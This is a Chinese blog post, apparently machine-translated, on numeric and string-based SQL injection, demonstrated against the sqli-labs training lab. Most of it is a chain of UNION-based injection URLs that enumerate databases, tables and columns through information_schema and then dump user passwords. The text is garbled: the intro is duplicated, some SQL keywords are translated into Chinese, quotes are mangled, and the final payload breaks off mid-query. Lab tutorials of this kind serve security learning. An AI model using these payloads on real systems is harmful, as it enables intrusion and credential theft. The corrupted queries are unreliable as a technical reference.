sql错误的字符串/数字型注入 sql字符串转换错误

sql错误的字符串/数字型注入错误的字符串/数字型注入
1.数字型注入
当输入的参数为整形时,如果存在注入漏洞,可以认为是数字型注入。
2.字符型注入
当输入的参数为字符串时,称为字符型。字

插入错误的字符串/数字

1. 数字化注入

如果输入参数是整数,并且存在注入漏洞,则可以认为是数字注入。

2. 字符注入

当输入参数是字符串时,称为字符类型。字符类型和数字类型之间最大的区别之一是数字类型不需要用单引号括起来,而字符串通常需要用单引号括起来。

仅闭合符号不同

http://www.sqli-lab.cn/Less-1/?id=1或1=1 —

http://www.sqli-lab.cn/Less-1/?id=1\’ order by 3 –+ #字段个数为3

http://www.sqli-lab.cn/Less-1/?id=1\’ and 1=2 Union select 1,2,3 –+ #显示位为2, 3

http://www.sqli-lab.cn/Less-1/?id=1\’ and 1=2 连接选择1,version(),database() –+

显示所有数据库名称

http://www.sqli-lab.cn/Less-1/?id=1\’ AND 1=2 Union select 1,(select group_concat(schema_name) from information_schema.schemata),3

查询security中所有表名

http://www.sqli-lab.cn/Less-1/?id=1\’ AND 1=2 Union select 1,2,(select group_concat(table_name) from information_schema.tables where table_schema=\’security\’)–+

然后使用以下语句分解列名称:

http://www.sqli-lab.cn/Less-1/?id=1\’ AND 1=2 Union select 1,2,(select group_concat(column_name) from information_schema.columns where table_name=\’users\’) –+

分解用户名和密码

http://www.sqli-lab.cn/Less-1/?id=1\’ AND 1=2 Union select 1,(select group_concat(password) from security.users) ,(select gro

#以上有关SQL错误字符串/数字注入的相关内容来自网络,仅供参考。相关信息请参见官方公告。

原创文章,作者:CSDN,如若转载,请注明出处:https://www.sudun.com/ask/92942.html

(0)
CSDN的头像CSDN
上一篇 2024年7月4日
下一篇 2024年7月4日

相关推荐

发表回复

您的电子邮箱地址不会被公开。 必填项已用 * 标注